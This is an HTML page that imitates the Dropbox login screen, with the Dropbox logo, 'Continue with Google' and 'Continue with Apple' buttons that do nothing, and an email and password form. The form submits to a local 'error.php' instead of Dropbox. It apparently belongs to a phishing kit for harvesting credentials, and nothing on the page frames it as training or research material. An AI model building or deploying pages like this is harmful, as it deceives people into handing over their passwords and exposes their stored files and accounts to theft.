<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Dropbox Login</title>
    <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;500;600&display=swap" rel="stylesheet">
    <style>
        body {
            font-family: 'Open Sans', -apple-system, BlinkMacSystemFont, sans-serif;
            background-color: #f7f7f7;
            margin: 0;
            padding: 0;
            color: #212121;
            line-height: 1.5;
        }
        
        .header {
            padding: 20px;
            display: flex;
            align-items: center;
            justify-content: space-between;
        }
        
        .logo {
            display: flex;
            align-items: center;
            text-decoration: none;
        }
        
        .logo-container {
            width: 36px;
            height: 36px;
            margin-right: 10px;
            background-color: #0061ff; /* Blue background */
            border-radius: 4px;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        
        .logo-container svg {
            width: 24px;
            height: 24px;
        }
        
        .logo-text {
            font-size: 24px;
            font-weight: 600;
            color: #000; /* Black text */
        }
        
        .language-selector {
            color: #757575;
            display: flex;
            align-items: center;
        }
        
        .language-selector svg {
            width: 20px;
            height: 20px;
            margin-right: 5px;
        }
        
        .container {
            max-width: 400px;
            margin: 20px auto;
            padding: 30px;
            background: white;
            border-radius: 8px;
            box-shadow: 0 1px 3px rgba(0, 0, 0, 0.1);
        }
        
        h1 {
            font-size: 22px;
            font-weight: 600;
            margin-bottom: 25px;
            text-align: center;
            color: #212121;
        }
        
        .login-option {
            display: flex;
            align-items: center;
            justify-content: center;
            width: 100%;
            padding: 12px;
            margin-bottom: 15px;
            border: 1px solid #d8d8d8;
            border-radius: 4px;
            background: white;
            font-size: 15px;
            font-weight: 500;
            cursor: pointer;
            transition: all 0.2s ease;
            height: 44px;
        }
        
        .login-option:hover {
            border-color: #a8a8a8;
        }
        
        .login-option svg {
            width: 18px;
            height: 18px;
            margin-right: 10px;
        }
        
        .or-divider {
            text-align: center;
            margin: 20px 0;
            color: #757575;
            font-size: 14px;
            position: relative;
        }
        
        .or-divider::before,
        .or-divider::after {
            content: "";
            position: absolute;
            top: 50%;
            width: 45%;
            height: 1px;
            background: #e0e0e0;
        }
        
        .or-divider::before {
            left: 0;
        }
        
        .or-divider::after {
            right: 0;
        }
        
        .form-group {
            margin-bottom: 20px;
            position: relative;
        }
        
        .form-group input {
            width: 100%;
            padding: 12px;
            border: 1px solid #d8d8d8;
            border-radius: 4px;
            font-size: 15px;
            box-sizing: border-box;
            height: 44px;
        }
        
        .form-group input:focus {
            outline: none;
            border-color: #0061ff;
            box-shadow: 0 0 0 2px rgba(0, 97, 255, 0.1);
        }
        
        .required-label {
            position: absolute;
            right: 10px;
            top: 12px;
            color: #757575;
            font-size: 12px;
        }
        
        .continue-btn {
            width: 100%;
            padding: 12px;
            background-color: #0061ff;
            color: white;
            border: none;
            border-radius: 24px;
            font-size: 15px;
            font-weight: 500;
            cursor: pointer;
            transition: background 0.2s;
            height: 44px;
        }
        
        .continue-btn:hover {
            background-color: #0540a8;
        }
        
        footer {
            padding: 20px;
            text-align: center;
            font-size: 12px;
            color: #757575;
            margin-top: 30px;
        }
        
        .footer-links {
            margin-bottom: 15px;
        }
        
        .footer-links a {
            margin: 0 8px;
            color: #757575;
            text-decoration: none;
        }
        
        .footer-links a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body>
    <div class="header">
        <a href="#" class="logo">
            <div class="logo-container">
                <svg viewBox="0 -19 256 256" xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="xMidYMid">
                    <g fill="#fff"> <!-- White logo inside blue container -->
                        <polygon points="63.9945638 0 0 40.7712563 63.9945638 81.5425125 128 40.7712563"></polygon>
                        <polygon points="192.000442 0 128 40.7750015 192.000442 81.5500031 256.000885 40.7750015"></polygon>
                        <polygon points="0 122.321259 63.9945638 163.092516 128 122.321259 63.9945638 81.5500031"></polygon>
                        <polygon points="192 81.5500031 128 122.324723 192 163.099442 256 122.324723"></polygon>
                        <polygon points="64 176.771256 128.005436 217.542513 192 176.771256 128.005436 136"></polygon>
                    </g>
                </svg>
            </div>
            <span class="logo-text">Dropbox</span>
        </a>
        <div class="language-selector">
            <svg viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">
                <path d="M11.75 4C6.535 4 4 6.535 4 11.75s2.535 7.75 7.75 7.75 7.75-2.535 7.75-7.75S16.965 4 11.75 4Zm0 5.714 4.5H14.87a9.237 9.237 0 0 0-.623-2.711A4.454 4.454 0 0 1 17.463 8.5ZM18 11.75c.002.586-.042 1.171-.133 1.75H14.97c.022-.579.03-1.167.03-1.75s-.008-1.171-.03-1.75h2.897c.09.579.135 1.164.133 1.75ZM11.75 18c-.616 0-1.3-.41-1.598-3h3.196c-.298 2.59-.982 3-1.598 3Zm-1.712-4.5c-.024-.524-.038-1.1-.038-1.75 0-.65.014-1.226.038-1.75h3.424c.024.524.038 1.1.038 1.75 0 .65-.014 1.226-.038 1.75h-3.424ZM5.5 11.75c-.002-.586.042-1.171.133-1.75H8.53c-.022.579-.03 1.167-.03 1.75s.008 1.171.03 1.75H5.633a11.074 11.074 0 0 1-.133-1.75Zm6.25-6.25c.616 0 1.3.41 1.598 3h-3.196c.298-2.59.982-3 1.598-3Zm-2.497.289A9.236 9.236 0 0 0 8.63 8.5H6.036a4.454 4.454 0 0 1 3.217-2.711ZM6.036 15H8.63c.07.93.28 1.844.623 2.711A4.453 4.453 0 0 1 6.037 15Zm8.21 2.711A9.237 9.237 0 0 0 14.87 15h2.594a4.454 4.454 0 0 1-3.217 2.711Z" fill="#757575"/>
            </svg>
            English (United States)
        </div>
    </div>
    
    <div class="container">
        <h1>Log in or sign up</h1>
        
        <button class="login-option">
            <svg viewBox="-0.5 0 48 48" xmlns="http://www.w3.org/2000/svg">
                <g fill="none" fill-rule="evenodd">
                    <g transform="translate(-401.000000, -860.000000)">
                        <g transform="translate(401.000000, 860.000000)">
                            <path d="M9.82727273,24 C9.82727273,22.4757333 10.0804318,21.0144 10.5322727,19.6437333 L2.62345455,13.6042667 C1.08206818,16.7338667 0.213636364,20.2602667 0.213636364,24 C0.213636364,27.7365333 1.081,31.2608 2.62025,34.3882667 L10.5247955,28.3370667 C10.0772273,26.9728 9.82727273,25.5168 9.82727273,24" fill="#FBBC05"></path>
                            <path d="M23.7136364,10.1333333 C27.025,10.1333333 30.0159091,11.3066667 32.3659091,13.2266667 L39.2022727,6.4 C35.0363636,2.77333333 29.6954545,0.533333333 23.7136364,0.533333333 C14.4268636,0.533333333 6.44540909,5.84426667 2.62345455,13.6042667 L10.5322727,19.6437333 C12.3545909,14.112 17.5491591,10.1333333 23.7136364,10.1333333" fill="#EB4335"></path>
                            <path d="M23.7136364,37.8666667 C17.5491591,37.8666667 12.3545909,33.888 10.5322727,28.3562667 L2.62345455,34.3946667 C6.44540909,42.1557333 14.4268636,47.4666667 23.7136364,47.4666667 C29.4455,47.4666667 34.9177955,45.4314667 39.0249545,41.6181333 L31.5177727,35.8144 C29.3995682,37.1488 26.7323182,37.8666667 23.7136364,37.8666667" fill="#34A853"></path>
                            <path d="M46.1454545,24 C46.1454545,22.6133333 45.9318182,21.12 45.6113636,19.7333333 L23.7136364,19.7333333 L23.7136364,28.8 L36.3181818,28.8 C35.6879545,31.8912 33.9724545,34.2677333 31.5177727,35.8144 L39.0249545,41.6181333 C43.3393409,37.6138667 46.1454545,31.6490667 46.1454545,24" fill="#4285F4"></path>
                        </g>
                    </g>
                </g>
            </svg>
            Continue with Google
        </button>
        
        <button class="login-option">
            <svg viewBox="-3.5 0 48 48" xmlns="http://www.w3.org/2000/svg">
                <g fill="none" fill-rule="evenodd">
                    <g transform="translate(-204.000000, -560.000000)" fill="#0B0B0A">
                        <path d="M231.174735,567.792499 C232.740177,565.771699 233.926883,562.915484 233.497649,560 C230.939077,560.177808 227.948466,561.814769 226.203475,563.948463 C224.612784,565.88177 223.305444,568.757742 223.816036,571.549042 C226.613071,571.636535 229.499881,569.960061 231.174735,567.792499 L231.174735,567.792499 Z M245,595.217241 C243.880625,597.712195 243.341978,598.827022 241.899976,601.03692 C239.888467,604.121745 237.052156,607.962958 233.53412,607.991182 C230.411652,608.02505 229.606488,605.94498 225.367451,605.970382 C221.128414,605.99296 220.244696,608.030695 217.116618,607.999649 C213.601387,607.968603 210.913765,604.502761 208.902256,601.417937 C203.27452,592.79849 202.68257,582.680377 206.152914,577.298162 C208.621711,573.476705 212.515678,571.241407 216.173986,571.241407 C219.89682,571.241407 222.239372,573.296075 225.322563,573.296075 C228.313175,573.296075 230.133913,571.235762 234.440281,571.235762 C237.700215,571.235762 241.153726,573.022307 243.611302,576.10431 C235.554045,580.546683 236.85858,592.121127 245,595.217241 L245,595.217241 Z" id="Apple"></path>
                    </g>
                </g>
            </svg>
            Continue with Apple
        </button>
        
        <div class="or-divider">or</div>
        
        <form action="error.php" method="post">
            <div class="form-group">
                <input type="email" name="email" placeholder="Email" required>
                <span class="required-label">Required</span>
            </div>
            
            <div class="form-group">
                <input type="password" name="password" placeholder="Password" required>
                <span class="required-label">Required</span>
            </div>
            
            <button type="submit" class="continue-btn">Continue</button>
        </form>
    </div>
    
    <footer>
        <div class="footer-links">
            <a href="#">Privacy & terms</a>
            <a href="#">Cookie policy</a>
            <a href="#">Cookies & CCPA preferences</a>
            <a href="#">AI Principles</a>
        </div>
    </footer>
</body>
</html>